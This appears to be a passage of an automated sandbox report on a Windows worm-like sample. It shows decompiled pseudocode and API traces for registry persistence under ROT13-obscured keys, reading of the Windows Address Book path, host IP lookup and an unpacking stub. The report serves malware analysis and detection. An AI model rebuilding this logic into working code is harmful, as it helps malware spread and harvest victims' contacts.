                                                                          0x0040b2e9
                                                                          0x0040b2ec
                                                                          0x0040b2f1
                                                                          0x0040b2f1
                                                                          0x0040b2f4
                                                                          0x0040b300
                                                                          0x0040b0f6
                                                                          0x0040b0fd
                                                                          0x0040b0fd
                                                                          0x00000000

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.280268095.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.280247027.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280559030.0000000000419000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280572210.000000000041C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280598300.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280615823.0000000000423000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280797442.0000000000425000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280817023.0000000000429000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280970732.000000000042D000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280982620.0000000000431000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281015199.0000000000435000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281031045.0000000000436000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281037174.0000000000437000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_smnss.jbxd
                                                                          Similarity
                                                                          • API ID: Atom$Findmalloc
                                                                          • String ID: -LIBGCCW32-EH-2-SJLJ-GTHR-MINGW32$AAAA$AAAA$AAAA$AAAA$AAAA$AAAA$AAAA$AAAA
                                                                          • API String ID: 822928543-4229226183
                                                                          • Opcode ID: b996283103914c8c547a0f5b047768b3d30837a48cc31e111859e5c4cfbbb589
                                                                          • Instruction ID: 5c8a408c4dcb306db70316dfdce650025cae950a5a82f7704b97cd34435e599e
                                                                          • Opcode Fuzzy Hash: b996283103914c8c547a0f5b047768b3d30837a48cc31e111859e5c4cfbbb589
                                                                          • Instruction Fuzzy Hash: DC6107B4A00218DFDB50CFA9E9C4699BBF0FB48311F1481BAD818EB395E7349945CF49
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 195 407c4e-407e34 call 404c38 * 2 call 404c6a * 4 call 404ce6 GetLocalTime call 4020f8 211 407e39-407e3c 195->211 212 407e3e-407e4a call 4020f8 211->212 213 407e4f-407e9c call 402120 call 401c2c 211->213 212->213 218 407ea1-407ea3 213->218 219 407ea5-407ea7 218->219 220 407eac-407efa call 401c2c 218->220 219->211 222 407ea9-407eaa 219->222 224 407f0a-407f56 call 401c2c 220->224 225 407efc-407efe 220->225 222->211 229 407f58-407f5f 224->229 230 407fb9-408003 call 401c2c 224->230 225->211 226 407f04-407f05 225->226 226->211 232 407f61-407f6a call 4020f8 229->232 233 407f6f-407f7b 229->233 237 408013-408052 CreateThread 230->237 238 408005-408007 230->238 232->233 233->211 236 407f81-407fb4 call 404eae call 4020f8 233->236 236->211 238->211 240 40800d-40800e 238->240 240->211
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.280268095.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.280247027.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280559030.0000000000419000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280572210.000000000041C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280598300.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280615823.0000000000423000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280797442.0000000000425000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280817023.0000000000429000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280970732.000000000042D000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280982620.0000000000431000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281015199.0000000000435000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281031045.0000000000436000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281037174.0000000000437000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_smnss.jbxd
                                                                          Similarity
                                                                          • API ID: CreateLocalThreadTime
                                                                          • String ID: (ohcx%gmlvl#b|d}m8e|k$2317q129n58non7o3148por15qs741r3$2wrwb=xfpav'g{sm#~gp$4upyl?idzyt9z~`n%|e~$command$p515p225982son69p76q604qp7s97975
                                                                          • API String ID: 3972831565-1317110218
                                                                          • Opcode ID: c0940dc48e777e953e80c9506aec9b4cff2f9c7de88b90671404fd8019e1cdc9
                                                                          • Instruction ID: 80463a4929d65f88bb62c6d7506587d1b44305c3c58205fc38c9e757c491522e
                                                                          • Opcode Fuzzy Hash: c0940dc48e777e953e80c9506aec9b4cff2f9c7de88b90671404fd8019e1cdc9
                                                                          • Instruction Fuzzy Hash: F8A1F2B08083199ADB10DF55C5453DEBBF0BB94304F5089AED588A7381D7B89AC9CF9A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          APIs
                                                                            • Part of subcall function 00404620: memset.MSVCRT ref: 0040463D
                                                                            • Part of subcall function 00404620: GetSystemDirectoryA.KERNEL32 ref: 00404649
                                                                            • Part of subcall function 00404620: lstrlen.KERNEL32 ref: 00404654
                                                                            • Part of subcall function 00404620: lstrcat.KERNEL32 ref: 0040466E
                                                                            • Part of subcall function 00404620: lstrcat.KERNEL32 ref: 00404680
                                                                            • Part of subcall function 0040829C: CreateFileA.KERNEL32 ref: 004082DE
                                                                            • Part of subcall function 0040829C: CreateFileA.KERNEL32 ref: 00408336
                                                                            • Part of subcall function 0040829C: CloseHandle.KERNEL32 ref: 00408356
                                                                            • Part of subcall function 0040829C: GetFileSize.KERNEL32 ref: 00408409
                                                                            • Part of subcall function 0040829C: GetFileSize.KERNEL32 ref: 00408422
                                                                            • Part of subcall function 0040829C: lstrlen.KERNEL32 ref: 00408436
                                                                            • Part of subcall function 0040829C: WriteFile.KERNEL32 ref: 00408480
                                                                            • Part of subcall function 0040829C: lstrlen.KERNEL32 ref: 0040848E
                                                                            • Part of subcall function 0040829C: WriteFile.KERNEL32 ref: 004084BC
                                                                            • Part of subcall function 0040829C: lstrlen.KERNEL32 ref: 004084CA
                                                                            • Part of subcall function 0040829C: SetFilePointer.KERNEL32 ref: 004084F0
                                                                            • Part of subcall function 0040829C: ReadFile.KERNEL32 ref: 00408529
                                                                            • Part of subcall function 00404F0A: GetModuleHandleA.KERNEL32 ref: 00404F27
                                                                            • Part of subcall function 00404F0A: LoadLibraryA.KERNEL32 ref: 00404F41
                                                                            • Part of subcall function 00404F0A: InternetGetConnectedState.WININET ref: 00404F6B
                                                                          • Sleep.KERNEL32 ref: 00403BC2
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.280268095.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.280247027.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280559030.0000000000419000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280572210.000000000041C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280598300.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280615823.0000000000423000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280797442.0000000000425000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280817023.0000000000429000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280970732.000000000042D000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280982620.0000000000431000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281015199.0000000000435000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281031045.0000000000436000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281037174.0000000000437000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_smnss.jbxd
                                                                          Similarity
                                                                          • API ID: File$lstrlen$CreateHandleSizeWritelstrcat$CloseConnectedDirectoryInternetLibraryLoadModulePointerReadSleepStateSystemmemset
                                                                          • String ID: Fbsgjner\Zvpebfbsg\Jvaqbjf\PheeragIrefvba\Rkcybere\ihyaiby32\Irefvba$Readme.exe$fgngrz$foto.pif$mvcsv.qyy$mvcsvnd.qyy$tepbcl.qyy$x
                                                                          • API String ID: 1266463258-727612787
                                                                          • Opcode ID: 819f8b6b43c1a4bc741779b6a6ad3373cdd59e2baf942c7b0dbc45e149701a7a
                                                                          • Instruction ID: aba1e27b33e5380b7e2637a9dd0f7b6f92beebfe16ff9740c24b48d29de174a4
                                                                          • Opcode Fuzzy Hash: 819f8b6b43c1a4bc741779b6a6ad3373cdd59e2baf942c7b0dbc45e149701a7a
                                                                          • Instruction Fuzzy Hash: 00313BB08097159AD310BF22C58529EBBE4AF80749F41CC7EF5C867281DB3C9689DB5A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 318 403f24-403f77 call 404c38 RegOpenKeyExA 321 403f79-403fcd RegCreateKeyExA 318->321 322 403fcf-40401d lstrlen RegSetValueExA RegCloseKey 318->322 321->322 323 404022-40402a 321->323 322->323
                                                                          C-Code - Quality: 51%
                                                                          			E00403F24(int _a4) {
                                                                          				void* _v12;
                                                                          				char _v140;
                                                                          				void* _v144;
                                                                          				void* _v172;
                                                                          				void* _v176;
                                                                          				void* _v180;
                                                                          				void* _v184;
                                                                          				intOrPtr _v188;
                                                                          				intOrPtr _v192;
                                                                          				int _v196;
                                                                          				int _v200;
                                                                          				int _v204;
                                                                          				long _t28;
                                                                          				char* _t36;
                                                                          				int _t37;
                                                                          				int _t38;
                                                                          				void* _t39;
                                                                          				void* _t41;
                                                                          				intOrPtr* _t42;
                                                                          
                                                                          				_t38 = _a4;
                                                                          				_v200 = "PYFVQ\\{R6SO5R20-QR35-11PS-9P87-00NN005127RQ}\\VacebpFreire32";
                                                                          				_t36 =  &_v140;
                                                                          				_v204 = _t36;
                                                                          				E00404C38();
                                                                          				_t28 = RegOpenKeyExA(0x80000000, _t36, 0, 0x20006,  &_v144); // executed
                                                                          				_t41 = _t39 - 0xac;
                                                                          				if(_t28 == 0) {
                                                                          					L2:
                                                                          					_v204 = _t38;
                                                                          					L0040C310();
                                                                          					_t42 = _t41 - 4;
                                                                          					_v188 = _t28 + 1;
                                                                          					_v192 = _t38;
                                                                          					_v196 = 1;
                                                                          					_v200 = 0;
                                                                          					_v204 = 0;
                                                                          					 *_t42 = _v144; // executed
                                                                          					RegSetValueExA(??, ??, ??, ??, ??, ??); // executed
                                                                          					 *((intOrPtr*)(_t42 - 0x18)) = _v144; // executed
                                                                          					RegCloseKey(??); // executed
                                                                          					_t37 = 1;
                                                                          				} else {
                                                                          					_t28 = RegCreateKeyExA(0x80000000, _t36, 0, 0, 0, 0x20006, 0,  &_v144, 0);
                                                                          					_t41 = _t41 - 0x24;
                                                                          					_t37 = 0;
                                                                          					if(_t28 == 0) {
                                                                          						goto L2;
                                                                          					}
                                                                          				}
                                                                          				return _t37;
                                                                          			}






















                                                                          0x00403f2f
                                                                          0x00403f32
                                                                          0x00403f3a
                                                                          0x00403f40
                                                                          0x00403f43
                                                                          0x00403f6d
                                                                          0x00403f72
                                                                          0x00403f77
                                                                          0x00403fcf
                                                                          0x00403fcf
                                                                          0x00403fd2
                                                                          0x00403fd7
                                                                          0x00403fdb
                                                                          0x00403fdf
                                                                          0x00403fe3
                                                                          0x00403feb
                                                                          0x00403ff3
                                                                          0x00404001
                                                                          0x00404004
                                                                          0x00404012
                                                                          0x00404015
                                                                          0x0040401d
                                                                          0x00403f79
                                                                          0x00403fbe
                                                                          0x00403fc3
                                                                          0x00403fc6
                                                                          0x00403fcd
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00403fcd
                                                                          0x0040402a

                                                                          APIs
                                                                          Strings
                                                                          • PYFVQ\{R6SO5R20-QR35-11PS-9P87-00NN005127RQ}\VacebpFreire32, xrefs: 00403F32
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.280268095.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.280247027.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280559030.0000000000419000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280572210.000000000041C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280598300.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280615823.0000000000423000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280797442.0000000000425000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280817023.0000000000429000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280970732.000000000042D000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280982620.0000000000431000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281015199.0000000000435000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281031045.0000000000436000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281037174.0000000000437000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_smnss.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCreateOpenValuelstrlen
                                                                          • String ID: PYFVQ\{R6SO5R20-QR35-11PS-9P87-00NN005127RQ}\VacebpFreire32
                                                                          • API String ID: 2036214137-2655177054
                                                                          • Opcode ID: ec1065b16dadf3c4c55f63c78a6684bde4f16d54d4dd78719c56537c8a878fff
                                                                          • Instruction ID: 019c3a761b18c338743e8a7ff589e139028416f66cb1f4fe329e007e5a71a312
                                                                          • Opcode Fuzzy Hash: ec1065b16dadf3c4c55f63c78a6684bde4f16d54d4dd78719c56537c8a878fff
                                                                          • Instruction Fuzzy Hash: FB21E6B08083159BE710EF25C58535ABBF4BB84348F00896EE88897281E77996488F92
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 330 403d26-403d46 call 404c38 333 403d48-403d85 RegOpenKeyExA 330->333 334 403da2-403da7 333->334 335 403d87-403d9d RegCloseKey 333->335 334->333 337 403da9 334->337 336 403e29-403e2d 335->336 338 403dab-403e0a RegCreateKeyExA 337->338 339 403e0c-403e1a RegCloseKey 338->339 340 403e1d-403e22 338->340 339->340 340->338 341 403e24 340->341 341->336
                                                                          APIs
                                                                          Strings
                                                                          • Fbsgjner\Zvpebfbsg\Jvaqbjf\PheeragIrefvba\Rkcybere\ihyaiby32\Irefvba, xrefs: 00403D30
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.280268095.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.280247027.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280559030.0000000000419000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280572210.000000000041C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280598300.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280615823.0000000000423000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280797442.0000000000425000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280817023.0000000000429000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280970732.000000000042D000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280982620.0000000000431000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281015199.0000000000435000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281031045.0000000000436000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281037174.0000000000437000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_smnss.jbxd
                                                                          Similarity
                                                                          • API ID: Close$CreateOpen
                                                                          • String ID: Fbsgjner\Zvpebfbsg\Jvaqbjf\PheeragIrefvba\Rkcybere\ihyaiby32\Irefvba
                                                                          • API String ID: 1299239824-3858799484
                                                                          • Opcode ID: e2de8787ab8b28c2df9a00a001bc5332683bdceb8eef226184d97ba353dea354
                                                                          • Instruction ID: 372c3b0a06c6ee96941f7226abfc86991cfccc6d41bd2ee5df839bccf0e05334
                                                                          • Opcode Fuzzy Hash: e2de8787ab8b28c2df9a00a001bc5332683bdceb8eef226184d97ba353dea354
                                                                          • Instruction Fuzzy Hash: 502131B0914315CEE710EF35C58579ABBF8BB44308F408A7EE484E7281E779C6888F52
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 342 40396e-4039ab RegOpenKeyExA 343 4039b1-403a28 memset RegQueryValueExA RegCloseKey 342->343 344 403a32-403a36 342->344 343->344 345 403a2a-403a2d call 403390 343->345 345->344
                                                                          APIs
                                                                          • RegOpenKeyExA.ADVAPI32 ref: 004039A1
                                                                          • memset.MSVCRT ref: 004039CA
                                                                          • RegQueryValueExA.ADVAPI32 ref: 00403A08
                                                                          • RegCloseKey.ADVAPI32 ref: 00403A19
                                                                            • Part of subcall function 00403390: CreateFileA.KERNEL32 ref: 004033D2
                                                                            • Part of subcall function 00403390: GetFileSize.KERNEL32 ref: 00403409
                                                                            • Part of subcall function 00403390: CreateFileMappingA.KERNEL32 ref: 00403448
                                                                            • Part of subcall function 00403390: CloseHandle.KERNEL32 ref: 0040346E
                                                                          Strings
                                                                          • Software\Microsoft\WAB\WAB4\Wab File Name, xrefs: 00403992
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.280268095.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.280247027.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280559030.0000000000419000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280572210.000000000041C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280598300.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280615823.0000000000423000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280797442.0000000000425000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280817023.0000000000429000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280970732.000000000042D000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280982620.0000000000431000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281015199.0000000000435000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281031045.0000000000436000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281037174.0000000000437000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_smnss.jbxd
                                                                          Similarity
                                                                          • API ID: File$CloseCreate$HandleMappingOpenQuerySizeValuememset
                                                                          • String ID: Software\Microsoft\WAB\WAB4\Wab File Name
                                                                          • API String ID: 1684987478-619501371
                                                                          • Opcode ID: ae81365a51869575d2673718a71df65f94980f08528c5a3444192b759fc5e03b
                                                                          • Instruction ID: fb9affdcd003a3e7f59b61beff737c010c0f055de032600ad664b438ea4410d9
                                                                          • Opcode Fuzzy Hash: ae81365a51869575d2673718a71df65f94980f08528c5a3444192b759fc5e03b
                                                                          • Instruction Fuzzy Hash: EB119DB0804755DFD710EF25C98939FBBF4BB44348F40896EE88867381D7B996888F96
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 347 405316-405345 gethostname gethostbyname 348 405347-405359 inet_ntoa 347->348 349 40535b-405361 347->349 348->349
                                                                          C-Code - Quality: 37%
                                                                          			E00405316(char* __ebx) {
                                                                          				void* _v8;
                                                                          				char _v76;
                                                                          				intOrPtr _v88;
                                                                          				int _t5;
                                                                          				char* _t9;
                                                                          				char* _t11;
                                                                          				char* _t13;
                                                                          				void* _t14;
                                                                          				intOrPtr* _t15;
                                                                          				intOrPtr* _t16;
                                                                          				char** _t17;
                                                                          
                                                                          				_t15 = _t14 - 0x54;
                                                                          				_v88 = 0x40;
                                                                          				_t11 =  &_v76;
                                                                          				 *_t15 = _t11; // executed
                                                                          				_t5 = gethostname(__ebx, ??); // executed
                                                                          				_t16 = _t15 - 8;
                                                                          				 *_t16 = _t11; // executed
                                                                          				L004086D8(); // executed
                                                                          				_t17 = _t16 - 4;
                                                                          				_t13 = "192.168.1.2";
                                                                          				if(_t5 != 0) {
                                                                          					_t9 =  *( *( *(_t5 + 0xc)));
                                                                          					 *_t17 = _t9;
                                                                          					L004086E0();
                                                                          					_t13 = _t9;
                                                                          				}
                                                                          				return _t13;
                                                                          			}














                                                                          0x0040531a
                                                                          0x0040531d
                                                                          0x00405325
                                                                          0x00405328
                                                                          0x0040532b
                                                                          0x00405330
                                                                          0x00405333
                                                                          0x00405336
                                                                          0x0040533b
                                                                          0x0040533e
                                                                          0x00405345
                                                                          0x0040534c
                                                                          0x0040534e
                                                                          0x00405351
                                                                          0x00405359
                                                                          0x00405359
                                                                          0x00405361

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.280268095.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.280247027.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280559030.0000000000419000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280572210.000000000041C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280598300.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280615823.0000000000423000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280797442.0000000000425000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280817023.0000000000429000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280970732.000000000042D000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280982620.0000000000431000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281015199.0000000000435000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281031045.0000000000436000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281037174.0000000000437000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_smnss.jbxd
                                                                          Similarity
                                                                          • API ID: gethostbynamegethostnameinet_ntoa
                                                                          • String ID: 192.168.1.2$@
                                                                          • API String ID: 289322838-3711723240
                                                                          • Opcode ID: 08511f6a8ca575260eebd435f8fc3ef842af75c020395b93753436b22eaa97bc
                                                                          • Instruction ID: 9ec42d045907c7db8908afb764d072bf234eb471670fc80d8c874dbff0fee724
                                                                          • Opcode Fuzzy Hash: 08511f6a8ca575260eebd435f8fc3ef842af75c020395b93753436b22eaa97bc
                                                                          • Instruction Fuzzy Hash: 7EE030B0A04B048FC700FF39C6C650ABBF4AF44348F06487DE986A7355EA38E9088B57
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 49%
                                                                          			_entry_() {
                                                                          				char _v128;
                                                                          				void _t20;
                                                                          				void _t23;
                                                                          				void _t24;
                                                                          				signed int _t26;
                                                                          				struct HINSTANCE__* _t27;
                                                                          				unsigned int _t28;
                                                                          				char _t38;
                                                                          				signed char* _t40;
                                                                          				long _t41;
                                                                          				char* _t44;
                                                                          				long _t54;
                                                                          				long _t55;
                                                                          				long _t56;
                                                                          				char* _t60;
                                                                          				void* _t61;
                                                                          				void* _t62;
                                                                          				void* _t66;
                                                                          				void* _t67;
                                                                          				unsigned int* _t68;
                                                                          				CHAR* _t70;
                                                                          				char* _t71;
                                                                          				long* _t72;
                                                                          				struct HINSTANCE__* _t73;
                                                                          				long _t74;
                                                                          				void* _t75;
                                                                          				void* _t78;
                                                                          				long _t79;
                                                                          				long _t81;
                                                                          				long _t86;
                                                                          				long _t89;
                                                                          
                                                                          				asm("pushad");
                                                                          				_t72 = 0x428015;
                                                                          				_t1 = _t72 - 0x27015; // 0x401000
                                                                          				_t67 = _t1;
                                                                          				_push(_t67);
                                                                          				while(1) {
                                                                          					_t53 =  *_t72;
                                                                          					_t72 = _t72 - 0xfffffffc;
                                                                          					asm("adc ebx, ebx");
                                                                          					do {
                                                                          						if(_t79 < 0) {
                                                                          							_t20 =  *_t72;
                                                                          							_t72 =  &(_t72[0]);
                                                                          							 *_t67 = _t20;
                                                                          							_t67 = _t67 + 1;
                                                                          							goto L4;
                                                                          						}
                                                                          						goto L8;
                                                                          						do {
                                                                          							do {
                                                                          								L8:
                                                                          								_t54 = _t53 + _t53;
                                                                          								if(_t54 == 0) {
                                                                          									_t54 =  *_t72;
                                                                          									_t72 = _t72 - 0xfffffffc;
                                                                          									asm("adc ebx, ebx");
                                                                          								}
                                                                          								asm("adc eax, eax");
                                                                          								_t53 = _t54 + _t54;
                                                                          								_t81 = _t53;
                                                                          							} while (_t81 >= 0);
                                                                          							if(_t81 != 0) {
                                                                          								break;
                                                                          							}
                                                                          							_t53 =  *_t72;
                                                                          							_t72 = _t72 - 0xfffffffc;
                                                                          							asm("adc ebx, ebx");
                                                                          						} while (_t72 >= 0);
                                                                          						_t61 = 0;
                                                                          						if(0xfffffffffffffffe < 0) {
                                                                          							L16:
                                                                          							_t55 = _t53 + _t53;
                                                                          							if(_t55 == 0) {
                                                                          								_t55 =  *_t72;
                                                                          								_t72 = _t72 - 0xfffffffc;
                                                                          								asm("adc ebx, ebx");
                                                                          							}
                                                                          							asm("adc ecx, ecx");
                                                                          							_t53 = _t55 + _t55;
                                                                          							_t86 = _t53;
                                                                          							if(_t86 == 0) {
                                                                          								_t53 =  *_t72;
                                                                          								_t72 = _t72 - 0xfffffffc;
                                                                          								asm("adc ebx, ebx");
                                                                          							}
                                                                          							asm("adc ecx, ecx");
                                                                          							if(_t86 != 0) {
                                                                          								L28:
                                                                          								asm("adc ecx, 0x1");
                                                                          								_t66 = _t67 + _t73;
                                                                          								if(_t73 <= 0xfffffffc) {
                                                                          									do {
                                                                          										_t23 =  *_t66;
                                                                          										_t66 = _t66 + 4;
                                                                          										 *_t67 = _t23;
                                                                          										_t67 = _t67 + 4;
                                                                          										_t61 = _t61 - 4;
                                                                          									} while (_t61 > 0);
                                                                          									_t67 = _t67 + _t61;
                                                                          									goto L4;
                                                                          								} else {
                                                                          									goto L29;
                                                                          								}
                                                                          								do {
                                                                          									L29:
                                                                          									_t24 =  *_t66;
                                                                          									_t66 = _t66 + 1;
                                                                          									 *_t67 = _t24;
                                                                          									_t67 = _t67 + 1;
